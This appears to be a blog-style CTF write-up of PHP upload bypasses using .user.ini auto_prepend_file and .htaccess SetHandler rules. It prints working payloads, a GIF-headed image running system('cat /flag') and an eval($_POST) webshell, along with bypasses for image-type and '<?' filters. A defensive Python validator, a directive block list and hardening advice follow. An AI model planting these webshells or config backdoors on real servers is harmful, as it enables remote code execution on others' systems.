File upload vulnerability (.user.ini and .htaccess)

Part 1: .user.ini

.user.ini is effectively a per-directory php.ini that an ordinary user can drop into a web-served directory. The settings it can override are those whose changeable mode is PHP_INI_PERDIR or PHP_INI_USER; in fact every mode other than PHP_INI_SYSTEM (PHP_INI_ALL included) can be set through .user.ini. Note that PHP only reads .user.ini under the CGI/FastCGI SAPIs (php-fpm and the like), which is why an nginx + php-fpm target such as the one below is in scope.

Unlike php.ini, .user.ini is loaded dynamically: after changing it there is no need to restart the web server or PHP, only to wait at most user_ini.cache_ttl seconds (default 300) for it to be re-read.

Two directives make .user.ini a convenient "backdoor": auto_prepend_file and auto_append_file. For example:

auto_prepend_file=01.gif

01.gif is the file that will be included before every PHP script in that directory.

So with .user.ini we can make every PHP file in a directory "automatically" include a chosen file, and that file can be an ordinary PHP file or a one-line webshell.

Example: [SUCTF 2019]CheckIn

1. Probing shows:

The server is nginx.

The file content may not contain <?.

The upload is checked with PHP's exif_imagetype(); prefixing the file with the GIF header GIF89a is enough to satisfy it.

2. With the .user.ini analysis above in mind, the approach is clear: upload a .user.ini like this:

GIF89a
auto_prepend_file=a.jpg


3. Notice that there is already an index.php in the upload directory. All we need is one executable PHP file in that directory, so .user.ini is clearly the intended test point and this approach should work.

Then upload an image like this as a.jpg:

GIF89a
<script language='php'>system('cat /flag');</script>

Finally, visit http://9f26d33b-a50f-44fd-8485-c2721470c2a1.node3.buuoj.cn/uploads/e2e7ec165ba05a5e1f3198caa7e22b54/index.php

and the flag is returned.

Part 2: .htaccess

1. .htaccess is generally used to leave a backdoor and to bypass a suffix blacklist.

Create a text file containing

AddType application/x-httpd-php

which makes all files parse as PHP.

2. To leave a backdoor, add a PHP parsing rule in .htaccess, for example treating every file whose name contains 1 as PHP:

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

With this rule 12345.png will be executed as PHP.

Example: [GXYCTF2019]BabyUpload

1. Bypass the file-type check by sending the request with

Content-Type: image/jpeg

2. First upload a .htaccess file with the following content

SetHandler application/x-httpd-php


3. The file name suffix may not start with ph, and the content is filtered for <?.
Upload an image shell like this:

GIF89a?
<script language="php">eval($_POST['a']);</script>


4. Connect to it with AntSword.

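Both write-ups rely on the same three defender-side gaps: the upload handler accepts a dotfile name such as .user.ini or .htaccess, it trusts an image header (exif_imagetype() or a client-supplied Content-Type) instead of checking the magic bytes against the extension, and it filters only the literal "<?" while PHP versions before 7 also honour the <script language="php"> form. The Python below is an added example (not code from either write-up or from any of the challenge sources) showing one way to close those gaps in an upload handler and to sweep an existing upload directory for files that were already planted; it assumes uploads land in a single directory served by PHP, and the sample files in demo() are constructed for the demonstration.

```python
"""Upload-handler checks against the .user.ini / .htaccess tricks shown above.

Added example, not code from the original write-up. Assumptions: uploads are
stored in one web-served directory, and the handler sees the client-supplied
file name and raw bytes. Sample files in demo() are constructed for this demo.
"""
import os
import re
import tempfile
from typing import List, Optional, Tuple

# File names that change server behaviour when dropped into a served directory.
CONFIG_FILE_NAMES = {".user.ini", ".htaccess", "php.ini", "web.config"}

ALLOWED_EXT = {"gif", "png", "jpg", "jpeg"}

# Magic bytes each allowed extension must begin with (bytes.startswith takes a tuple).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Directives that include a file into every script or hand files to the PHP handler.
DANGEROUS_DIRECTIVES = re.compile(
    r"^\s*(auto_prepend_file|auto_append_file|SetHandler|AddType|AddHandler"
    r"|php_value|php_flag)\b",
    re.IGNORECASE | re.MULTILINE,
)

# PHP code markers: the usual open tags plus the <script language="php"> form
# (honoured by PHP < 7) that slips past a plain "<?" filter.
PHP_CODE = re.compile(r"<\?|<script[^>]*\blanguage\s*=\s*['\"]?php\b", re.IGNORECASE)


def reject_reason(filename: str, content: bytes) -> Optional[str]:
    """Return why an upload should be refused, or None if it passes every check."""
    base = os.path.basename(filename)
    if base.startswith(".") or base.lower() in CONFIG_FILE_NAMES:
        return "dotfile or server configuration file name"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        return f"extension .{ext} not allowed"
    if not content.startswith(MAGIC[ext]):
        return "content header does not match extension"
    text = content.decode("latin-1")  # never fails; keeps byte offsets
    if DANGEROUS_DIRECTIVES.search(text):
        return "contains server configuration directives"
    if PHP_CODE.search(text):
        return "contains PHP code markers"
    return None


def audit_upload_dir(path: str) -> List[Tuple[str, str]]:
    """Re-check files already on disk (a retrospective sweep of an upload directory)."""
    findings = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                data = fh.read(64 * 1024)  # the markers of interest sit near the top
            reason = reject_reason(name, data)
            if reason is not None:
                findings.append((os.path.relpath(full, path), reason))
    return sorted(findings)


def demo() -> List[Tuple[str, str]]:
    """Plant constructed samples modelled on the write-up in a temp dir and audit it."""
    samples = {
        ".user.ini": b"GIF89a\nauto_prepend_file=a.gif\n",
        "a.gif": b"GIF89a\n<script language='php'>system('cat /flag');</script>\n",
        ".htaccess": b"SetHandler application/x-httpd-php\n",
        "cat.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,  # benign image stub
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return audit_upload_dir(tmp)


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {why}")
```

Running the file audits the constructed directory and reports .user.ini, .htaccess and the GIF carrying the script tag while letting the plain PNG through. Content scanning of this kind is a second line only; the settings that actually remove the mechanism are an empty user_ini.filename in php.ini (PHP then never looks for per-directory ini files) and AllowOverride None on the upload directory in Apache (so .htaccess is ignored), together with serving uploads from a location that has no PHP handler at all.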


Source: blog.csdn.net/weixin_49298265/article/details/111572316